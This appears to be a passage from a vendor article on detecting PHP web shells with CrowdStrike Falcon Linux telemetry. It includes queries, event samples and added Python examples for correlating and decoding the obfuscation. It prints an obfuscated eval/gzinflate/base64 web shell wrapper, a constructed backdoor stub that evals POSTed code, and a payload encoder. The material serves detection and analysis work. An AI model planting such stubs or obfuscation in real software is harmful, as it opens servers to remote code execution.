Advanced Web Shell Detection and Prevention: A Deep Dive into CrowdStrike’s Linux Sensor Capabilities

We can narrow the pre-populated query to the events behind the disk operation shown in the detection by appending an #event_simpleName filter for the script-related event types:

aid=120da82da60d444d90dbc4f70df11660 (TargetProcessId=1761176184180866943 OR ContextProcessId=1761176184180866943) #event_simpleName=/ScriptControl|PhpExecuteScript|PhpBase64Decode|PhpEvalString|NewScriptWritten/

Figure 7. Falcon LogScale query filtering for web shell-related events

This query results in multiple correlated events that allow the analyst to investigate the detection:

#event_simpleName: NewScriptWritten

This event will show the full path and file name of the script written to disk, along with the process that wrote the script.

{
  "#event_simpleName": "NewScriptWritten",
  "ContextBaseFileName": "apache2",
  "FileName": "cache.php",
  "FilePath": "/var/www/html/uploads/"
}

Figure 8. Relevant fields from NewScriptWritten

#event_simpleName: ScriptControlDetectInfo

This event shows the full contents of the script that triggered the detection, along with the full process ancestry. Note that the ScriptContent is the script as written to disk: the argument to eval() is still base64-encoded and deflated, so this event alone does not reveal what the web shell does.

{
  "#event_simpleName": "ScriptControlDetectInfo",
  "ScriptContent": "<?php [...trimmed for brevity...] eval(htmlspecialchars_decode(gzinflate(base64_decode($XtnR)))); ?>",
  "ImageFileName": "/usr/sbin/apache2"
}

Figure 9. ScriptContent from ScriptControlDetectInfo event

#event_simpleName: PhpExecuteScript

This event shows the PHP file that has been executed.

{
  "#event_simpleName": "PhpExecuteScript",
  "TargetFileName": "/var/www/html/uploads/cache.php"
}

Figure 10. TargetFileName shown in PhpExecuteScript event
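The correlation an analyst makes by eye across the NewScriptWritten and PhpExecuteScript events (Figures 8 and 10) can be automated over an event export. The following Python is an added example, not CrowdStrike code or a Falcon LogScale query. It assumes the events are available as JSON lines carrying the field names shown above, that FilePath is the directory and FileName the base name as in Figure 8, and that the set of web-server worker names is a reasonable assumption for a Linux host; the sample export, the second host and its process IDs are constructed.

```python
import json
from typing import Dict, List, Tuple

# Assumption: worker process names a PHP web shell would typically be written
# by on a Linux host (the page itself only shows apache2).
WEB_SERVER_PROCS = {"apache2", "httpd", "nginx", "php-fpm"}

# Constructed sample export (JSON lines). Field names follow the events quoted
# in Figures 8 and 10; the second host's aid, the process IDs and the benign
# deploy-tool write are made up for the example.
SAMPLE_EXPORT = """\
{"aid": "120da82da60d444d90dbc4f70df11660", "ContextProcessId": "1761176184180866943", "#event_simpleName": "NewScriptWritten", "ContextBaseFileName": "apache2", "FilePath": "/var/www/html/uploads/", "FileName": "cache.php"}
{"aid": "120da82da60d444d90dbc4f70df11660", "TargetProcessId": "1761176184180866943", "#event_simpleName": "PhpExecuteScript", "TargetFileName": "/var/www/html/uploads/cache.php"}
{"aid": "constructed-host-b", "ContextProcessId": "4242", "#event_simpleName": "NewScriptWritten", "ContextBaseFileName": "git", "FilePath": "/var/www/html/", "FileName": "index.php"}
{"aid": "constructed-host-b", "TargetProcessId": "4243", "#event_simpleName": "PhpExecuteScript", "TargetFileName": "/var/www/html/index.php"}
"""


def parse_export(text: str) -> List[dict]:
    """Parse a JSON-lines export into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def correlate_web_shell_drops(events: List[dict]) -> List[dict]:
    """Flag a PHP script that a web-server worker wrote and that the PHP
    runtime later executed on the same host. Events are assumed to be in
    time order, as an export sorted by timestamp would be."""
    written: Dict[Tuple[str, str], dict] = {}
    hits: List[dict] = []
    for ev in events:
        name = ev.get("#event_simpleName")
        if name == "NewScriptWritten" and ev.get("ContextBaseFileName") in WEB_SERVER_PROCS:
            # FilePath is the directory and FileName the base name, as in Figure 8.
            path = ev["FilePath"].rstrip("/") + "/" + ev["FileName"]
            written[(ev["aid"], path)] = ev
        elif name == "PhpExecuteScript":
            key = (ev["aid"], ev["TargetFileName"])
            if key in written:
                w = written[key]
                hits.append({
                    "aid": key[0],
                    "path": key[1],
                    "written_by": w["ContextBaseFileName"],
                    "writer_pid": w.get("ContextProcessId"),
                    "executor_pid": ev.get("TargetProcessId"),
                })
    return hits


if __name__ == "__main__":
    for hit in correlate_web_shell_drops(parse_export(SAMPLE_EXPORT)):
        print(json.dumps(hit))
```

The benign pair on the second host is deliberately not flagged: the script was written by a deployment tool, not by the web server worker, which is the distinction that makes an upload-directory write by apache2 worth an analyst's attention.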

#event_simpleName: PhpEvalString

This event shows the content passed to the eval function, which was obfuscated within the original script content shown in Figure 9. This gives analysts immediate visibility into what the web shell does without manual deobfuscation.

{
  "#event_simpleName": "PhpEvalString",
  "PhpEvalContent": "?><?php\nerror_reporting(0);\nhttp_response_code(404);\nfunction decrypt($encryptedData) { /* AES-256-CBC decryption */ }\nif (decrypt('jFmSkTCWn5zcll7d3dHObg')){ echo \"/7ZC2gHDStsE4z8Z0cifN3B+C/UO2vClZymoftbo/scHScvWfgNerZjP2hTO3Obd\"; exit; }\n$auth_key = \"5a8c9a20daaef1947b0e9dee69622dc8\";\n/* User-agent filtering and authentication logic */\n[...trimmed for brevity...]"
}

Figure 11. Decoded eval content in PhpEvalString event
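Without the PhpEvalString event, recovering what Figure 11 shows means unwinding the wrapper in Figure 9 by hand: base64_decode, then gzinflate, then htmlspecialchars_decode, innermost first. The following Python is an added example, not code from the page or from CrowdStrike, that performs that static decode on a file pulled from disk. It maps the three PHP functions to their Python equivalents (base64.b64decode; zlib.decompress with wbits=-15 for raw DEFLATE, which is what gzinflate consumes; html.unescape). The variable name $XtnR comes from Figure 9; the inner shell stub and its auth key are constructed for the example and are not the real payload.

```python
import base64
import html
import re
import zlib
from typing import Optional

# Wrapper seen in the ScriptContent field (Figure 9):
#   eval(htmlspecialchars_decode(gzinflate(base64_decode($var))));
PAYLOAD_RE = re.compile(
    r"eval\(htmlspecialchars_decode\(gzinflate\(base64_decode\(\$(\w+)\)\)\)\)"
)


def encode_payload(php_source: str) -> str:
    """Inverse of the eval() chain, i.e. what the shell's author ran to
    produce the blob. Used here only to build constructed test input."""
    escaped = html.escape(php_source, quote=True).encode()   # htmlspecialchars()
    comp = zlib.compressobj(level=9, wbits=-15)               # gzdeflate(): raw DEFLATE
    deflated = comp.compress(escaped) + comp.flush()
    return base64.b64encode(deflated).decode()                # base64_encode()


def decode_eval_chain(script_content: str) -> Optional[str]:
    """Statically recover the code eval() would execute, or None if the
    script does not use this exact wrapper."""
    m = PAYLOAD_RE.search(script_content)
    if not m:
        return None
    var = re.escape(m.group(1))
    # Find the assignment of the obfuscated blob to that variable.
    assign = re.search(r"\$" + var + r"\s*=\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*;", script_content)
    if not assign:
        return None
    raw = base64.b64decode(assign.group(1))     # base64_decode()
    inflated = zlib.decompress(raw, -15)        # gzinflate(): raw DEFLATE, no zlib/gzip header
    return html.unescape(inflated.decode())     # htmlspecialchars_decode()


# Constructed inner payload mimicking the shape of Figure 11 (404 response,
# hard-coded auth key). The key and the check are made up for the example.
SAMPLE_INNER = (
    "?><?php\nerror_reporting(0);\nhttp_response_code(404);\n"
    '$auth_key = "constructed-example-key";\n'
    'if (isset($_POST["k"]) && $_POST["k"] === $auth_key) { eval($_POST["c"]); }\n'
)

# Constructed on-disk script in the form of Figure 9.
SAMPLE_SCRIPT = (
    "<?php $XtnR = '" + encode_payload(SAMPLE_INNER) + "'; "
    "eval(htmlspecialchars_decode(gzinflate(base64_decode($XtnR)))); ?>"
)

if __name__ == "__main__":
    print(decode_eval_chain(SAMPLE_SCRIPT))
```

The point of the example is the wbits=-15 detail: gzinflate expects raw DEFLATE with no header, so a decoder that calls zlib.decompress with the default settings fails on exactly the blob the sensor decoded for free in Figure 11.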
